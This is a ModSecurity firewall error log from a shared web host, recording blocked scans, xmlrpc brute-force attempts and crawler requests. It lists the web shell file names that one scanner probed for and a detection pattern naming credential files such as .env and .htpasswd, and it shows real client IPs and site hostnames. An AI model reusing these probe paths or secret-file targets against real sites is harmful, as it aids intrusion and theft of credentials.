[Tue May 26 14:02:06.242749 2026] [security2:error] [pid 578581:tid 578746] [client 4.193.189.92:6515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/mar.php"] [unique_id "ahVahpm_8al1sb-umPtq5AAAACM"]
[Tue May 26 14:02:06.613619 2026] [security2:error] [pid 578581:tid 578714] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVahpm_8al1sb-umPtq4wAAAAM"]
[Tue May 26 14:02:06.967229 2026] [security2:error] [pid 578581:tid 578760] [client 4.193.189.92:1371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/my1.php"] [unique_id "ahVahpm_8al1sb-umPtq_gAAADE"]
[Tue May 26 14:02:07.491507 2026] [security2:error] [pid 578581:tid 578790] [client 181.177.110.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVah5m_8al1sb-umPtrCQAAAE8"], referer: https://anujtradingco.com
[Tue May 26 14:02:07.655436 2026] [security2:error] [pid 578581:tid 578820] [client 20.104.227.76:31494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.ameritradeng.com"] [uri "/wk/index.php"] [unique_id "ahVah5m_8al1sb-umPtrEQAAAG0"]
[Tue May 26 14:02:07.704756 2026] [security2:error] [pid 578581:tid 578793] [client 4.193.189.92:3111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/mm.php"] [unique_id "ahVah5m_8al1sb-umPtrEgAAAFI"]
[Tue May 26 14:02:07.751538 2026] [security2:error] [pid 578581:tid 578741] [client 202.141.30.10:65459] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVah5m_8al1sb-umPtrEAAAAB4"]
[Tue May 26 14:02:07.751687 2026] [security2:error] [pid 578581:tid 578741] [client 202.141.30.10:65459] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVah5m_8al1sb-umPtrEAAAAB4"]
[Tue May 26 14:02:08.219909 2026] [security2:error] [pid 578581:tid 578787] [client 129.222.147.134:57304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaiJm_8al1sb-umPtrIwAAAEw"]
[Tue May 26 14:02:08.223754 2026] [security2:error] [pid 578581:tid 578787] [client 129.222.147.134:57304] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaiJm_8al1sb-umPtrIwAAAEw"]
[Tue May 26 14:02:08.423967 2026] [security2:error] [pid 578581:tid 578734] [client 4.193.189.92:6531] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/network.php"] [unique_id "ahVaiJm_8al1sb-umPtrKQAAABc"]
[Tue May 26 14:02:08.535891 2026] [security2:error] [pid 578581:tid 578761] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaiJm_8al1sb-umPtrGwAAADI"]
[Tue May 26 14:02:09.181724 2026] [security2:error] [pid 578581:tid 578751] [client 4.193.189.92:2230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/new.php"] [unique_id "ahVaiZm_8al1sb-umPtrOAAAACg"]
[Tue May 26 14:02:09.892960 2026] [security2:error] [pid 578581:tid 578780] [client 4.193.189.92:3107] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/0x.php"] [unique_id "ahVaiZm_8al1sb-umPtrTgAAAEU"]
[Tue May 26 14:02:10.348633 2026] [security2:error] [pid 578581:tid 578788] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaiZm_8al1sb-umPtrUQAAAE0"]
[Tue May 26 14:02:10.609441 2026] [security2:error] [pid 578581:tid 578711] [client 4.193.189.92:6524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/0.php"] [unique_id "ahVaipm_8al1sb-umPtragAAAAA"]
[Tue May 26 14:02:11.362347 2026] [security2:error] [pid 578581:tid 578718] [client 4.193.189.92:6651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/oxshell.php"] [unique_id "ahVai5m_8al1sb-umPtreAAAAAc"]
[Tue May 26 14:02:11.457040 2026] [security2:error] [pid 578581:tid 578746] [client 141.164.80.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVai5m_8al1sb-umPtrewAAACM"], referer: https://www.anujtradingco.com/
[Tue May 26 14:02:11.503057 2026] [security2:error] [pid 578581:tid 578785] [client 89.221.204.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVai5m_8al1sb-umPtrfgAAAEo"], referer: https://www.anujtradingco.com/
[Tue May 26 14:02:12.093902 2026] [security2:error] [pid 578581:tid 578735] [client 4.193.189.92:1348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/php8.php"] [unique_id "ahVajJm_8al1sb-umPtrlwAAABg"]
[Tue May 26 14:02:12.217769 2026] [security2:error] [pid 578581:tid 578821] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVai5m_8al1sb-umPtrjgAAAG4"]
[Tue May 26 14:02:12.370285 2026] [security2:error] [pid 578581:tid 578807] [client 20.104.227.76:18916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.ameritradeng.com"] [uri "/inputs.php"] [unique_id "ahVajJm_8al1sb-umPtrnQAAAGA"]
[Tue May 26 14:02:12.831961 2026] [security2:error] [pid 578581:tid 578797] [client 4.193.189.92:6576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/p.php"] [unique_id "ahVajJm_8al1sb-umPtrqwAAAFY"]
[Tue May 26 14:02:12.911317 2026] [security2:error] [pid 578581:tid 578825] [client 89.221.204.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVajJm_8al1sb-umPtrrgAAAHI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&moderation-hash=683babac959ef6b0812e0407a9e1141b
[Tue May 26 14:02:12.923174 2026] [security2:error] [pid 578581:tid 578826] [client 141.164.80.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVajJm_8al1sb-umPtrrwAAAHM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 14:02:13.572701 2026] [security2:error] [pid 578581:tid 578805] [client 4.193.189.92:6556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/php.php"] [unique_id "ahVajZm_8al1sb-umPtrxwAAAF4"]
[Tue May 26 14:02:14.013252 2026] [security2:error] [pid 578581:tid 578720] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVajZm_8al1sb-umPtrzQAAAAk"]
[Tue May 26 14:02:14.327843 2026] [security2:error] [pid 578581:tid 578795] [client 4.193.189.92:1403] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/past.php"] [unique_id "ahVajpm_8al1sb-umPtr5wAAAFQ"]
[Tue May 26 14:02:15.052049 2026] [security2:error] [pid 578581:tid 578824] [client 4.193.189.92:6554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/root.php"] [unique_id "ahVaj5m_8al1sb-umPtsCQAAAHE"]
[Tue May 26 14:02:15.813446 2026] [security2:error] [pid 578581:tid 578711] [client 4.193.189.92:6627] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/r.php"] [unique_id "ahVaj5m_8al1sb-umPtsFgAAAAA"]
[Tue May 26 14:02:15.916169 2026] [security2:error] [pid 578581:tid 578713] [client 81.22.193.204:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVaj5m_8al1sb-umPtsHAAAAAI"], referer: https://www.anujtradingco.com/
[Tue May 26 14:02:16.071530 2026] [security2:error] [pid 578581:tid 578787] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaj5m_8al1sb-umPtsEgAAAEw"]
[Tue May 26 14:02:16.548536 2026] [security2:error] [pid 578581:tid 578833] [client 4.193.189.92:6754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/sid3.php"] [unique_id "ahVakJm_8al1sb-umPtsLQAAAHo"]
[Tue May 26 14:02:17.008038 2026] [security2:error] [pid 578581:tid 578778] [client 81.22.193.204:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVakJm_8al1sb-umPtsOwAAAEM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1440498&moderation-hash=735983836e1e6bd28c4a4e81e576fedc
[Tue May 26 14:02:17.262951 2026] [security2:error] [pid 578581:tid 578780] [client 4.193.189.92:6523] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/ss.php"] [unique_id "ahVakZm_8al1sb-umPtsQgAAAEU"]
[Tue May 26 14:02:17.396110 2026] [security2:error] [pid 578581:tid 578740] [client 202.76.176.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVakJm_8al1sb-umPtsQQAAAB0"]
[Tue May 26 14:02:17.920703 2026] [security2:error] [pid 578581:tid 578731] [client 185.193.167.178:54165] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eco-green.com.mx"] [uri "/.env"] [unique_id "ahVakZm_8al1sb-umPtsXgAAABQ"]
[Tue May 26 14:02:17.978116 2026] [security2:error] [pid 578581:tid 578806] [client 4.193.189.92:6712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/sts.php"] [unique_id "ahVakZm_8al1sb-umPtsXwAAAF8"]
[Tue May 26 14:02:18.037338 2026] [security2:error] [pid 578581:tid 578823] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVakZm_8al1sb-umPtsVQAAAHA"]
[Tue May 26 14:02:18.396109 2026] [security2:error] [pid 578581:tid 578749] [client 129.222.147.134:46979] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVakpm_8al1sb-umPtscgAAACY"]
[Tue May 26 14:02:18.396213 2026] [security2:error] [pid 578581:tid 578749] [client 129.222.147.134:46979] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVakpm_8al1sb-umPtscgAAACY"]
[Tue May 26 14:02:18.409163 2026] [security2:error] [pid 578581:tid 578816] [client 202.141.30.10:65423] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVakpm_8al1sb-umPtsdAAAAGk"]
[Tue May 26 14:02:18.409933 2026] [security2:error] [pid 578581:tid 578816] [client 202.141.30.10:65423] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVakpm_8al1sb-umPtsdAAAAGk"]
[Tue May 26 14:02:18.712227 2026] [security2:error] [pid 578581:tid 578752] [client 4.193.189.92:1350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/shell.php"] [unique_id "ahVakpm_8al1sb-umPtsgQAAACk"]
[Tue May 26 14:02:19.441946 2026] [security2:error] [pid 578581:tid 578731] [client 4.193.189.92:6688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/setup-config.php"] [unique_id "ahVak5m_8al1sb-umPtsnQAAABQ"]
[Tue May 26 14:02:19.561994 2026] [security2:error] [pid 578581:tid 578736] [client 185.193.167.247:54011] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "eco-green.com.mx"] [uri "/"] [unique_id "ahVak5m_8al1sb-umPtsoQAAABk"]
[Tue May 26 14:02:19.752507 2026] [security2:error] [pid 578581:tid 578812] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVak5m_8al1sb-umPtslgAAAGU"]
[Tue May 26 14:02:20.153843 2026] [security2:error] [pid 578581:tid 578762] [client 4.193.189.92:6596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/t.php"] [unique_id "ahValJm_8al1sb-umPtsswAAADM"]
[Tue May 26 14:02:20.377027 2026] [security2:error] [pid 578581:tid 578813] [client 185.193.167.145:21709] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "eco-green.com.mx"] [uri "/"] [unique_id "ahValJm_8al1sb-umPtstgAAAGY"]
[Tue May 26 14:02:20.865906 2026] [security2:error] [pid 578581:tid 578723] [client 4.193.189.92:3126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/up.php"] [unique_id "ahValJm_8al1sb-umPtsuwAAAAw"]
[Tue May 26 14:02:21.209167 2026] [security2:error] [pid 578581:tid 578758] [client 185.193.167.95:28671] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "eco-green.com.mx"] [uri "/"] [unique_id "ahValZm_8al1sb-umPtszwAAAC8"]
[Tue May 26 14:02:21.577191 2026] [security2:error] [pid 578581:tid 578789] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahValZm_8al1sb-umPtsxwAAAE4"]
[Tue May 26 14:02:21.588332 2026] [security2:error] [pid 578581:tid 578817] [client 4.193.189.92:6743] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/ultra.php"] [unique_id "ahValZm_8al1sb-umPts1gAAAGo"]
[Tue May 26 14:02:22.346287 2026] [security2:error] [pid 578581:tid 578828] [client 4.193.189.92:1564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/vv.php"] [unique_id "ahValpm_8al1sb-umPts8wAAAHU"]
[Tue May 26 14:02:23.175591 2026] [security2:error] [pid 578581:tid 578837] [client 4.193.189.92:1392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/V5.php"] [unique_id "ahVal5m_8al1sb-umPttDQAAAH4"]
[Tue May 26 14:02:23.425446 2026] [security2:error] [pid 578581:tid 578770] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahValpm_8al1sb-umPttCQAAADs"]
[Tue May 26 14:02:23.956171 2026] [security2:error] [pid 578581:tid 578769] [client 4.193.189.92:6762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/wp-user.php"] [unique_id "ahVal5m_8al1sb-umPttHQAAADo"]
[Tue May 26 14:02:24.522804 2026] [security2:error] [pid 578581:tid 578828] [client 114.119.156.165:41681] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahVamJm_8al1sb-umPttLwAAAHU"], referer: http://glorodavionics.com/beta/index.php?route=product%2Fcategory&path=72_76_119
[Tue May 26 14:02:24.711828 2026] [security2:error] [pid 578581:tid 578744] [client 4.193.189.92:1562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/wp-blog.php"] [unique_id "ahVamJm_8al1sb-umPttNQAAACE"]
[Tue May 26 14:02:25.278919 2026] [security2:error] [pid 578581:tid 578714] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVamJm_8al1sb-umPttOQAAAAM"]
[Tue May 26 14:02:25.442323 2026] [security2:error] [pid 578581:tid 578837] [client 4.193.189.92:6626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/wp.php"] [unique_id "ahVamZm_8al1sb-umPttSAAAAH4"]
[Tue May 26 14:02:26.150557 2026] [security2:error] [pid 578581:tid 578594] [remote 47.128.46.87:59728] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/category/blogs/"] [unique_id "ahVampm_8al1sb-umPttUgAAZQw"]
